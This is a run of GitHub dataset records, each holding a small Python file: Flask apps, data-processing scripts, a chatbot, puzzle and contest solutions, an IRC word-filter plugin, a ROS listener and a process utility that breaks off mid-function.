print('===============================================================================================')\n \n watch('RULES', 'FACTS')\n diagnostico = DiagnosticoEnfermedades()\n diagnostico.reset()\n \n\n diagnostico.declare(Sintoma(descripcion=sinto1))\n diagnostico.declare(Sintoma(descripcion=sinto2))\n diagnostico.declare(Sintoma(descripcion=sinto3))\n diagnostico.declare(Sintoma(descripcion=sinto4))\n diagnostico.declare(Sintoma(descripcion=sinto5))\n\n \n diagnostico.run()\n enfermedad = diagnostico.facts\n\n for d in 
enfermedad:\n if (type(enfermedad[d]) == Enfermedad):\n tipo = enfermedad[d]['tipo']\n resultado = {'resul':tipo}\n \n\n return render_template('diagnostico.html', resultado=resultado)\n\n print(tipo)\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"steven243/cumbe","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37901466707","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 21 00:35:10 2018\n\n@author: gaoyu\n\"\"\"\nfrom xlrd import open_workbook\nimport openpyxl\n\nwb = open_workbook('drug.xlsx')\nws=wb.sheet_by_index(0)\nnumber_of_cols = ws.ncols\nlst=[]\nfor i in range(number_of_cols-1):\n \n value = (ws.cell(0,i).value)\n lst.append(value)\n\nlst1=[]\nfor i in lst:\n name=''\n for j in i:\n if j.isupper() or j==' 'or j=='/':\n name=name+j\n else:\n break\n \n lst1.append(name)\nlst2=[]\nfor i in lst1:\n if i[len(i)-1]==' ':\n i=i[:-1]\n lst2.append(i)\n\nwb2 = openpyxl.load_workbook('drug.xlsx')\nws2=wb2.active\nws2.append(lst2)\nwb2.save('drug.xlsx')\nlst3=[]\nfor i in lst2:\n a=i.split('/')\n for j in a:\n lst3.append(j)\n \n \nlst4=[]\nfor i in lst3:\n if i in lst4:\n pass\n else:\n lst4.append(i)\n\nfile = open(\"substance_name.txt\", \"w\")\nfile.close() \nfor i in lst4:\n with open(\"substance_name.txt\", \"a\") as text_file:\n text_file.write(i+';')\n\n","repo_name":"MandyGaoGao/web-scrap-med-","sub_path":"3.3.1)active substance.py","file_name":"3.3.1)active substance.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32820567899","text":"from flask import Flask\nfrom faker import Faker\nimport requests\nimport csv\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef hello_world():\n return \"Hello, World!\"\n\n\n@app.route('/requirements/')\ndef req():\n with open('requirements.txt') as file:\n text = file.read()\n return f'{text}'\n\n\n@app.route('/generate-users/')\ndef users():\n f = Faker()\n user = []\n for i in range(100):\n name = f.name()\n mail = \"\".join(name.split()) + \"@mail.com\"\n user_name = name + \" : \" + mail.lower()\n user.append(user_name)\n\n return f'{user}'\n\n\n@app.route('/mean/')\ndef heiwei():\n pounds = 0.453592 # кг\n inches = 2.54 # см\n with open('templates/hw.csv') as csvfile:\n reader_object = csv.DictReader(csvfile, delimiter=\",\")\n height, weight = 0, 0\n for row in reader_object:\n height += float(row[\"Height(Inches)\"])\n weight += float(row[\"Weight(Pounds)\"])\n kol = int(row['Index'])\n\n return f'Средний рост: {(height/kol)*inches} см, Средний вес: {(weight/kol)/pounds} кг'\n\n\n@app.route('/space/')\ndef space():\n r = requests.get('http://api.open-notify.org/astros.json')\n a = r.json()[\"number\"]\n return f'

    Космонавтов на орбите: {a}

+{"seq_id":"31977911788","text":"import sqlite3\nimport json\nfrom models import Employee\nfrom models import Location\n\n\nEMPLOYEES = [\n    {\n        \"id\": 1,\n        \"name\": \"Justin Case\",\n        \"role\": \"staff\",\n        \"location_id\": 2\n    },\n    {\n        \"id\": 2,\n        \"name\": \"Irma Gawd\",\n        \"role\": \"staff\",\n        \"location_id\": 1\n    },\n    {\n        \"id\": 3,\n        \"name\": \"Paige Turner\",\n        \"role\": \"staff\",\n        \"location_id\": 1\n    }\n]\n\ndef get_all_employees():\n    \"\"\"This function gets all employees.\"\"\"\n    # Open a connection to the database\n    with sqlite3.connect(\"./kennel.sqlite3\") as conn:\n\n        # Just use these. It's a Black Box.\n        conn.row_factory = sqlite3.Row\n        db_cursor = conn.cursor()\n\n        # Write the SQL query to get the information you want\n        db_cursor.execute(\"\"\"\n        SELECT\n            e.id,\n            e.name,\n            e.address,\n            e.location_id,\n            l.name location_name,\n            l.address location_address\n        FROM Employee e\n        JOIN Location l\n            ON l.id = e.location_id\n        \"\"\")\n\n        # Initialize an empty list to hold all employee representations\n        employees = []\n\n        # Convert rows of data into a Python list\n        dataset = db_cursor.fetchall()\n\n        # Iterate list of data returned from database\n        for row in dataset:\n\n            # Create an employee instance from the current row.\n            # Note that the database fields are specified in\n            # exact order of the parameters defined in the\n            # Employee class above.\n            employee = Employee(row['id'], row['name'], row['address'],\n                                row['location_id'])\n\n            # Create a Location instance from the current row\n            location = Location(row['id'], row['location_name'], row['location_address'])\n\n            # Add the dictionary representation of the location to the animal\n            employee.location = location.__dict__\n\n            employees.append(employee.__dict__)\n\n    # Use `json` package to properly serialize list as JSON\n    return json.dumps(employees)\n\ndef get_single_employee(id):\n    \"\"\"This function returns a single employee.\"\"\"\n    with sqlite3.connect(\"./kennel.sqlite3\") as conn:\n        conn.row_factory = sqlite3.Row\n        db_cursor = conn.cursor()\n\n        # Use a ? parameter to inject a variable's value\n        # into the SQL statement.\n        db_cursor.execute(\"\"\"\n        SELECT\n            a.id,\n            a.name,\n            a.address,\n            a.location_id\n        FROM employee a\n        WHERE a.id = ?\n        \"\"\", ( id, ))\n\n        # Load the single result into memory\n        data = db_cursor.fetchone()\n\n        # Create an employee instance from the current row\n        employee = Employee(data['id'], data['name'], data['address'], data['location_id'])\n\n        return json.dumps(employee.__dict__)\n\ndef create_employee(employee):\n    \"\"\"This function adds the new employee dictionary to the employee list\"\"\"\n    max_id = EMPLOYEES[-1][\"id\"]\n\n    new_id = max_id + 1\n\n    employee[\"id\"] = new_id\n\n    EMPLOYEES.append(employee)\n\n    return employee\n\ndef delete_employee(id):\n    \"\"\"This function deletes a single employee\"\"\"\n    employee_index = -1\n\n    for index, employee in enumerate (EMPLOYEES):\n        if employee[\"id\"] == id:\n            employee_index = index\n\n    if employee_index >= 0:\n        EMPLOYEES.pop(employee_index)\n\ndef update_employee(id, new_employee):\n    \"\"\"This function deletes AND replaces employee with updated info\"\"\"\n    for index, employee in enumerate(EMPLOYEES):\n        if employee[\"id\"] == id:\n            EMPLOYEES[index] = new_employee\n            break\n    \ndef get_employees_by_location(location_id):\n    \"\"\"This function gets employees by their location id\"\"\"\n\n    with sqlite3.connect(\"./kennel.sqlite3\") as conn:\n        conn.row_factory = sqlite3.Row\n        db_cursor = conn.cursor()\n\n        # Write the SQL query to get the information you want\n        db_cursor.execute(\"\"\"\n        select\n            a.id,\n            a.name,\n            a.address,\n            a.location_id\n        from Employee a\n        WHERE a.location_id = ?\n        \"\"\", ( location_id, ))\n\n        employees = []\n        dataset = db_cursor.fetchall()\n\n        for row in dataset:\n            employee = Employee(row['id'], row['name'], row['address'], row['location_id'])\n            employees.append(employee.__dict__)\n\n    return json.dumps(employees)\n","repo_name":"michellecaner/kennels-server","sub_path":"views/employees_requests.py","file_name":"employees_requests.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"40509846653","text":"#!/bin/env python\n\"\"\"\nMerge the individual tiles together for a given ETCCDI index\n\nRun as::\n\n  python merge_tiles.py --index TX90p\n\n--index     ETCCDI index to process\n\"\"\"\n\n#*******************************************\n# START\n#*******************************************\nimport os\nimport glob\nimport calendar\nimport numpy as np\n\nimport iris\nfrom iris.experimental.equalise_cubes import equalise_attributes\nimport iris.coord_categorisation\nimport netCDF4 as ncdf\n\nimport utils\n\n#****************************************\ndef merge_cubes(index, timescale):\n    '''\n    Find all the files which should be part of the cube and merge into a single list\n    '''\n\n    files = []\n    print(\"finding files\")\n    if timescale == \"ann\":\n\n        path = os.path.join(utils.DATALOC, \"indices\", \"{}ETCCDI_{}_climpact.era5_historical_*_{}-{}.nc\".format(index.lower(), \"yr\", utils.base_period_start, utils.base_period_end))\n        print(path)\n        files = glob.glob(path)\n    elif timescale == \"mon\":\n        path = os.path.join(utils.DATALOC, \"indices\", \"{}ETCCDI_{}_climpact.era5_historical_*_{}01-{}12.nc\".format(index.lower(), \"mon\", utils.base_period_start, utils.base_period_end))\n        print(path)\n        files = glob.glob(path)\n    \n    print(\"loading {} files\".format(len(files)))\n    cubelist = iris.load(files)\n    equalise_attributes(cubelist)\n\n    # and merge the cubes\n    merged_cubes = cubelist.concatenate()\n\n    assert len(merged_cubes) == 1\n\n    return merged_cubes[0] # merge_cubes\n\n#****************************************\ndef remove_coords(cube, monthly = True):\n    '''\n    Remove time bounds and added Auxillary coordinate of months\n    '''\n\n    cube.coord(\"time\").bounds = None\n\n    if monthly:\n        cube.remove_coord(\"month\")\n\n    return cube # remove_coords\n\n#****************************************\ndef main(index):\n    '''\n    Combine cubes for annual and monthly into single output file.\n    '''\n\n    if not os.path.exists(os.path.join(utils.DATALOC, \"final\")):\n        os.mkdir(os.path.join(utils.DATALOC, \"final\"))\n\n\n    # get annual cube\n    annual_cube = merge_cubes(index, \"ann\")\n    annual_cube.var_name = \"Ann\"\n    annual_cube = remove_coords(annual_cube, monthly = False)\n    annual_cube.data.fill_value = utils.MDI\n    annual_cube.missing_value = utils.MDI\n    annual_cube._FillValue = utils.MDI\n    \n    final_cubelist = [annual_cube]\n\n    if index in [\"TN10p\", \"TN90p\", \"TX10p\", \"TX90p\", \"TNn\", \"TNx\", \"TXn\", \"TXx\", \"DTR\", \"Rx1day\", \"Rx5day\"]:\n        # get monthly cube\n        monthly_cube = merge_cubes(index, \"mon\")\n\n        # now process cube into months\n        iris.coord_categorisation.add_month(monthly_cube, 'time', name='month')\n\n        # extract each month\n        for m in calendar.month_abbr:\n            if m == \"\":\n                continue\n            else:\n                print(m)\n                monthConstraint = iris.Constraint(month=m)\n\n                month_cube = monthly_cube.extract(monthConstraint)\n                month_cube.var_name = m\n                month_cube = remove_coords(month_cube)\n                \n                month_cube.data.fill_value = utils.MDI\n                month_cube.missing_value = utils.MDI\n                month_cube._FillValue = utils.MDI\n\n                final_cubelist += [month_cube]\n\n    # and save the list\n    iris.save(final_cubelist, os.path.join(utils.DATALOC, \"final\", \"ERA5_{}_1979-{}.nc\".format(index, utils.ENDYEAR)), fill_value=utils.MDI, zlib=True)\n\n    return # main\n\n\n#****************************************\nif __name__ == \"__main__\":\n\n    import argparse\n\n    # set up keyword arguments\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--index', dest='index', action='store', default=\"TX90p\", \n                        help='etccdi index')\n\n    args = parser.parse_args()\n\n    if args.index in [\"ETR\", \"R99pTOT\", \"R95pTOT\"]:\n        print(\"merging not required for {}\".format(args.index))\n    else:\n        main(args.index)\n    \n#*******************************************\n# END\n#*******************************************\n","repo_name":"rjhd2/era5_etccdi","sub_path":"merge_tiles.py","file_name":"merge_tiles.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
+{"seq_id":"21833292396","text":"import re\nimport math\nimport time\n\nimport supybot.conf as conf\nimport supybot.utils as utils\nimport supybot.ircdb as ircdb\nimport supybot.ircmsgs as ircmsgs\nfrom supybot.commands import *\nimport supybot.ircutils as ircutils\nimport supybot.callbacks as callbacks\n\nclass BadWords(callbacks.Privmsg):\n    \"\"\"Maintains a list of words that the bot is not allowed to say.\n    Can also be used to kick people that say these words, if the bot\n    has op.\"\"\"\n    def __init__(self, irc):\n        self.__parent = super(BadWords, self)\n        self.__parent.__init__(irc)\n        # This is so we can not filter certain outgoing messages (like list,\n        # which would be kinda useless if it were filtered).\n        self.filtering = True\n        self.lastModified = 0\n        self.words = conf.supybot.plugins.BadWords.words\n\n    def callCommand(self, name, irc, msg, *args, **kwargs):\n        if ircdb.checkCapability(msg.prefix, 'admin'):\n            self.__parent.callCommand(name, irc, msg, *args, **kwargs)\n        else:\n            irc.errorNoCapability('admin')\n\n    def sub(self, m):\n        replaceMethod = self.registryValue('replaceMethod')\n        if replaceMethod == 'simple':\n            return self.registryValue('simpleReplacement')\n        elif replaceMethod == 'nastyCharacters':\n            return self.registryValue('nastyChars')[:len(m.group(1))]\n\n    def inFilter(self, irc, msg):\n        self.filtering = True\n        # We need to check for bad words here rather than in doPrivmsg because\n        # messages don't get to doPrivmsg if the user is ignored.\n        if msg.command == 'PRIVMSG':\n            self.updateRegexp()\n            s = ircutils.stripFormatting(msg.args[1])\n            channel = msg.args[0]\n            if ircutils.isChannel(channel) and self.registryValue('kick', channel):\n                if self.regexp.search(s):\n                    if irc.nick in irc.state.channels[channel].ops:\n                        message = self.registryValue('kick.message', channel)\n                        irc.queueMsg(ircmsgs.kick(channel, msg.nick, message))\n                    else:\n                        self.log.warning('Should kick %s from %s, but not opped.',\n                                         msg.nick, channel)\n        return msg\n\n    def updateRegexp(self):\n        if self.lastModified < self.words.lastModified:\n            self.makeRegexp(self.words())\n            self.lastModified = time.time()\n\n    def outFilter(self, irc, msg):\n        if self.filtering and msg.command == 'PRIVMSG' and self.words():\n            self.updateRegexp()\n            s = msg.args[1]\n            if self.registryValue('stripFormatting'):\n                s = ircutils.stripFormatting(s)\n            t = self.regexp.sub(self.sub, s)\n            if t != s:\n                msg = ircmsgs.privmsg(msg.args[0], t, msg=msg)\n        return msg\n\n    def makeRegexp(self, iterable):\n        s = '(%s)' % '|'.join(map(re.escape, iterable))\n        if self.registryValue('requireWordBoundaries'):\n            s = r'\\b%s\\b' % s\n        self.regexp = re.compile(s, re.I)\n\n    def list(self, irc, msg, args):\n        \"\"\"takes no arguments\n\n        Returns the list of words being censored.\n        \"\"\"\n        L = list(self.words())\n        if L:\n            self.filtering = False\n            utils.sortBy(str.lower, L)\n            irc.reply(format('%L', L))\n        else:\n            irc.reply('I\\'m not currently censoring any bad words.')\n    list = wrap(list, ['admin'])\n\n    def add(self, irc, msg, args, words):\n        \"\"\" [ ...]\n\n        Adds all s to the list of words being censored.\n        \"\"\"\n        set = self.words()\n        set.update(words)\n        self.words.setValue(set)\n        irc.replySuccess()\n    add = wrap(add, ['admin', many('something')])\n\n    def remove(self, irc, msg, args, words):\n        \"\"\" [ ...]\n\n        Removes s from the list of words being censored.\n        \"\"\"\n        set = self.words()\n        for word in words:\n            set.discard(word)\n        self.words.setValue(set)\n        irc.replySuccess()\n    remove = wrap(remove, ['admin', many('something')])\n\n\nClass = BadWords\n\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:\n","repo_name":"Supybot/Supybot","sub_path":"plugins/BadWords/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"60"}
+{"seq_id":"40987620312","text":"from collections import defaultdict\nclass Solution:\n    def isIsomorphic(self, s: str, t: str) -> bool:\n        \n\n        default_1 = defaultdict(str)\n        default_2 = defaultdict(str)\n\n\n        for i in range(len(s)):\n            # create s -> t\n            if not default_1[s[i]]:\n                default_1[s[i]] = t[i]\n\n            # create t -> s\n            if not default_2[t[i]]:\n                default_2[t[i]] = s[i]\n\n            # check if the reference is correct\n            if default_1[s[i]] != t[i] or default_2[t[i]] != s[i]:\n                return False \n\n        return True \n\n# Time Complexity: O(n)\n# Space Complexity: O(26)","repo_name":"Logenleedev/--Data-Structure-and-Algorithm","sub_path":"Extra/hashmap/Leetcode_Solution/Leetcode_205_isomorphic_string.py","file_name":"Leetcode_205_isomorphic_string.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"74878298111","text":"from object_detection import Object_detection\nfrom algorithm import Algorithm\nimport time\na = Object_detection()\nb = Algorithm()\nwhile True:\n    a.read_frame()\n    a.get_indices()\n    object_dict = a.extract_info_from_indices()\n    \n    # Algorithm\n    b.feed_in(object_dict)\n    \n    # Call extract_and_update with the following parameters\n    # (object_1_id, object_2_id,iou_threshold,trigger_alarm_threshold,\n    # frame_buffer_threshold)\n    \n    # Max of trigger_alarm_threshold is frame_buffer_threshold\n    # If trigger_alarm_threshold/frame_buffer_threshold is a alarm\n    # alarm is triggered\n    \n    b.extract_and_update(0,2,0.1,44,50)\n    \n    # Print the real_alarm state for main object 0 with sub object 2\n    #print(b.real_alarm[\"0_2\"])\n    \n    a.show()\n\nprint(time.time()-now)\nprint(count)\n","repo_name":"justinkwan1216/Grad-cam","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"41157319053","text":"# gpt chatbot\nfrom config import my_key\nimport openai\n\n# setting the api key\nopenai.api_key = my_key\n\ndef chat_gpt_bot(prompt):\n    response = openai.ChatCompletion.create(\n        model=\"gpt-3.5-turbo\",\n        messages=[{'role':'user', 'content': prompt}]\n    )\n\n    # filter the response content\n    return response.choices[0].message.content.strip()\n\n\n\nif __name__ == \"__main__\":\n    while True:\n        user_input = input(\"You: \")\n\n        if user_input.lower() in ['quit', 'exit', 'break', 'bye', 'stop']:\n            break\n\n        response = chat_gpt_bot(user_input) # calling chat_gpt_bot function\n        print('ChatBot: ', response)\n\nprint('Script stopped')","repo_name":"abhi7745/gpt_chatbot","sub_path":"gpt_chatbot.py","file_name":"gpt_chatbot.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"73107521471","text":"import math\n\n\n# class for node\nclass Node(object):\n\n    # constructor\n    def __init__(self, new_layout, old_node_layout=None, wayCost=0, level=0):\n        self.layout = new_layout\n        self.level = level\n        # cost to move 1 tile compared to previous layout\n        self.wayCost = wayCost if wayCost else level\n        self.prev_node_layout = old_node_layout if old_node_layout else None\n\n    # function to print layout\n    def __repr__(self):\n        r_val = \"\"\n        layout = [chr(n + 48) for n in make_list_layout(self.layout)]\n        if \"0\" in layout:\n            layout[layout.index(\"0\")] = \" \"\n        else:\n            layout = [\" \"] + layout\n        for i in [0, 3, 6]:\n            r_val += \"\\n\" + (\"\".join(layout[i] + layout[i + 1] + layout[i + 2]))\n        return r_val\n\n    # redefined equality function\n    def __eq__(self, comp_node):\n        return True if self.layout == comp_node.layout else False\n\n\n# list class expansion to represent nodes\nclass NodeList(list):\n\n    # magic function to use in \"in\" clause\n    def __contains__(self, key):\n        layouts = (o.layout for o in self)\n        return key.layout in layouts\n\n\n# fast way to convert int to list\ndef make_list_layout(number):\n    return [number // 10 ** n % 10 for n in range(getCountOfDigits(number) - 1, -1, -1)]\n\n\n# function to enter layout with checking it for uniqueness and fullness\ndef input_layout(message):\n    while True:\n        layout = input(message)\n        if (len(layout) != 8) and (len(layout) != 9):\n            print(\"Invalid number of elements! Please enter again\")\n        else:\n            # checking uniqueness\n            checked = \"\"\n            legal = True\n            for ch in layout:\n                if ch not in checked:\n                    checked += ch\n                else:\n                    print(\"Numbers should not repeat! Try again\")\n                    legal = False\n                    break\n            # if everything is ok, check if we have only 8 elements - then the last is empty and we need\n            # to fill it with space\n            if legal:\n                if len(layout) == 8:\n                    layout += \"0\"\n                else:\n                    layout = list(layout)\n                    layout[layout.index(\" \")] = \"0\"\n                break\n    return int(\"\".join(layout))\n\n\n# universal func to print our lists of nodes without braces\ndef print_nodes(lst):\n    lines = [\"\", \"\", \"\", \"\"]\n    res = \"\"\n    if lst:\n        nodeCounter = 0\n        for n in lst:\n            layout = [chr(n + 48) for n in make_list_layout(n.layout)]\n            if \"0\" in layout:\n                layout[layout.index(\"0\")] = \" \"\n            else:\n                layout = [\" \"] + layout\n            digits = getCountOfDigits(n.wayCost)\n            lines[0] += \"\".join(layout[:3]) + \" \" * (digits + 1)\n            lines[1] += \"\".join(layout[3:6]) + \" \" * (digits + 1)\n            lines[2] += \"\".join(layout[6:]) + \" \" * (digits + 1)\n            lines[3] += \"w:{}\".format(n.wayCost) + \" \" * 2\n            nodeCounter += 1\n            if nodeCounter == 30:\n                res += \"\\n\".join(lines) + \"\\n\\n\"\n                lines = [\"\", \"\", \"\", \"\"]\n                nodeCounter = 0\n        res += \"\\n\".join(lines)\n        print(res)\n    else:\n        print(\"Empty list\")\n\n\n# function to print list of nodes without wayCost\ndef print_list(lst):\n    lines = [\"\", \"\", \"\"]\n    res = \"\"\n    if lst:\n        nodeCounter = 0\n        for n in lst:\n            layout = [chr(ch + 48) for ch in make_list_layout(n)]\n            if \"0\" in layout:\n                layout[layout.index(\"0\")] = \" \"\n            else:\n                layout = [\" \"] + layout\n            lines[0] += \"\".join(layout[:3]) + \" \"\n            lines[1] += \"\".join(layout[3:6]) + \" \"\n            lines[2] += \"\".join(layout[6:]) + \" \"\n            nodeCounter += 1\n            if nodeCounter == 30:\n                res += \"\\n\".join(lines) + \"\\n\\n\"\n                lines = [\"\", \"\", \"\"]\n                nodeCounter = 0\n        res += \"\\n\".join(lines)\n        print(res)\n    else:\n        print(\"Empty list\")\n\n\n# fast way to count amount of digits in a number\ndef getCountOfDigits(number):\n    return 1 if number == 1 or number == 0 else round(math.log10(number) + 0.5)\n","repo_name":"AlexIvanov11/AI_lab1","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"8591659792","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom gpiozero import LED\n\nred = LED(2)\nyellow = LED(3)\ngreen = LED(4)\n\ndef callback(data):\n    #rospy.loginfo(\"in call back\")\n    #rospy.loginfo(\"data is: %s\", data.data)\n    if data.data == \"red\":\n        rospy.loginfo(\"yes: RED\")\n        red.on()\n    elif data.data == \"no-red\":\n        rospy.loginfo(\"no: RED\")\n        red.off()\n    elif data.data == \"yellow\":\n        rospy.loginfo(\"yes: YELLOW\")\n        yellow.on()\n    elif data.data == \"no-yellow\":\n        rospy.loginfo(\"no: YELLOW\")\n        yellow.off()\n    elif data.data == \"green\":\n        rospy.loginfo(\"yes: GREEN\")\n        green.on()\n    elif data.data == \"no-green\":\n        rospy.loginfo(\"no: GREEN\")\n        green.off()\n    else:\n        rospy.loginfo(\"nothing: NOT MATCH\")\n\ndef listener():\n    rospy.init_node('listener', anonymous=True)\n    rospy.Subscriber(\"chatter\", String, callback)\n    rospy.loginfo(\"start listen through /chatter\")\n    rospy.spin()\n\nif __name__ == '__main__':\n    listener()\n","repo_name":"nquantum/gpio_catkin_ws","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
listener()\n","repo_name":"nquantum/gpio_catkin_ws","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71638087232","text":"import argparse\nimport string\n\n\ndef part_1(input_string):\n dance_moves = input_string.split(',')\n programs = list(string.ascii_lowercase[:16])\n for dance_move in dance_moves:\n if dance_move.startswith('s'):\n spin_size = int(dance_move[1:])\n programs = programs[-spin_size:] + programs[:-spin_size]\n continue\n\n if dance_move.startswith('x'):\n pos_A, pos_B = list(map(int, dance_move[1:].split('/')))\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n\n if dance_move.startswith('p'):\n program_A, program_B = dance_move[1:].split('/')\n pos_A = programs.index(program_A)\n pos_B = programs.index(program_B)\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n print(''.join(programs))\n\n\ndef part_2(input_string):\n dance_moves = input_string.split(',')\n programs = list(string.ascii_lowercase[:16])\n dance_time = 1000000000\n programs_history = []\n for i in range(dance_time): \n programs_state = ''.join(programs)\n if programs_state in programs_history:\n history_index = programs_history.index(programs_state)\n print(programs_history[history_index + dance_time % (i - history_index)])\n break\n\n for dance_move in dance_moves:\n if dance_move.startswith('s'):\n spin_size = int(dance_move[1:])\n programs = programs[-spin_size:] + programs[:-spin_size]\n continue\n\n if dance_move.startswith('x'):\n pos_A, pos_B = list(map(int, dance_move[1:].split('/')))\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n\n if dance_move.startswith('p'):\n program_A, program_B = dance_move[1:].split('/')\n pos_A = programs.index(program_A)\n pos_B = programs.index(program_B)\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n programs_history.append(programs_state)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--part\",\n help=\"Specify puzzle 1 or puzzle 2 to be solved. 
Run both by default.\",\n required=False)\n args = parser.parse_args()\n file_input = open('Input_16.txt', 'r')\n input_string = file_input.read()\n file_input.close()\n\n if args.part == '1':\n part_1(input_string)\n elif args.part == '2':\n part_2(input_string)\n else:\n part_1(input_string)\n part_2(input_string)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DSW41923/AoC_DSW41923","sub_path":"2017/Day_16.py","file_name":"Day_16.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39032073638","text":"# 실버3\n# 스택 수열\nimport sys\nN = int(sys.stdin.readline())\nT = [int(sys.stdin.readline()) for _ in range(N)]\n\nfail_check = False\ntemp_data = []\nresult = []\nindex = 0\nin_num = 1\nwhile N > index:\n\n if len(temp_data) > 0 and T[index] == temp_data[-1]:\n temp_data.pop()\n result.append(\"-\")\n index += 1\n else:\n if in_num > N:\n fail_check = True\n break\n temp_data.append(in_num)\n result.append(\"+\")\n in_num += 1\n\nif fail_check: print(\"NO\")\nelse: \n for i in result: print(i)\n\n\"\"\"\n\n8\n4\n3\n6\n8\n7\n5\n2\n1\n\n5\n1\n2\n5\n3\n4\n\n5\n3\n2\n1\n4\n5\n\"\"\"","repo_name":"woghks778803/algorithm-study","sub_path":"backjoon/Sliver/1874.py","file_name":"1874.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29193670328","text":"import sys\nimport pickle\nimport random\nfrom sets import Set\nimport sys\nimport numpy as np\n\n\nnotes = pickle.load(open(sys.argv[1], 'r'))\nk = int(sys.argv[2])\n\ndictionary = {}\n\n#get parameters from normal distribution (tick values)\nmy_array = []\nfor element in notes:\n my_array.append(element[0])\n\n#tick_standardDev = np.std(my_array)\n#tick_mean = np.mean(my_array) \n#print tick_mean\n\n#print np.random.normal(tick_mean, tick_standardDev, 1)\n\nfor i in range(0, len(notes)):\n this_value = notes[i][2]\n my_set = Set()\n if i < (len(notes) - 1): \n my_set.add(notes[i+1])\n for j in range((i + 1), len(notes) -1):\n if (notes[j][2] == this_value) and (this_value not in dictionary.keys()):\n my_set.add(notes[j+1])\n dictionary[this_value] = my_set\n\nfor element in dictionary:\n dictionary[element] = list(dictionary[element])\n\nstart = random.choice(list(dictionary.keys()))\noutput_list = []\n\nfor i in range(0, k): \n my_tuple = [random.choice(my_array)]\n my_note = random.choice(list(dictionary[start]))\n my_tuple.extend(my_note[1:])\n output_list.append(my_tuple)\n start = my_note[2]\n if random.randint(0, 100) < 5:\n start = random.choice(list(dictionary.keys()))\n \npickle.dump(output_list, open('MarkovDisBitch.p', 'wb'))\n","repo_name":"haldean/midigen","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9179295677","text":"'''\r\nRAISING YOUR OWN EXCEPTIONS\r\n'''\r\n\r\n\r\ndef raise_exception(alist, value):\r\n errors = []\r\n \r\n for i in alist:\r\n if i <= value:\r\n errors.append(ValueError(\"{} is not greater than {}\".format(i, value)))\r\n \r\n return errors\r\n\r\n\r\nprint(raise_exception([3], 2))\r\n","repo_name":"ivSaav/Programming-Fundamentals","sub_path":"RE13/raise_exception.py","file_name":"raise_exception.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} 
+{"seq_id":"71441905152","text":"import os\nimport platform\n\nfrom core import system as os_type\n\ntry:\n from commands import getstatusoutput\nexcept:\n from subprocess import getstatusoutput\n\n\n\ndef get_list():\n '''get process list'''\n res = []\n if os_type == 'Linux':\n for pid in os.listdir('/proc'):\n if pid.isdigit():\n res.append(get_base(pid))\n elif os_type == 'Darwin':\n pass\n elif os_type == 'Windows':\n pass\n return res\n\n\ndef get_name(pid):\n if not pid:\n return False\n name = None\n if os_type == 'Linux':\n comm = '/proc/%s/comm' % pid\n if os.path.exists(comm):\n with open(comm, 'r') as f:\n line = f.readline()\n name = line.strip()\n if not name:\n status = '/proc/%s/status' % pid\n if os.path.exists(status):\n with open(status, 'r') as f:\n line = f.readline()\n name = line.split()[1]\n elif os_type == 'Darwin':\n pass\n elif os_type == 'Windows':\n pass\n return name\n\n\ndef kill_process(name):\n '''kill process by name'''\n if not name:\n return\n pids = get_pids(name)\n # print('pid', pids)\n if pids:\n return kill_pids(pids)\n else:\n return False\n\n\ndef kill_pids(pids):\n '''kill process by pids'''\n if not pids:\n return\n if isinstance(pids, list):\n pids = ' '.join(pids) # to string\n if os_type in ('Linux', 'Darwin'):\n s_cmd = u'/bin/kill -9 %s' % pids\n status, result = 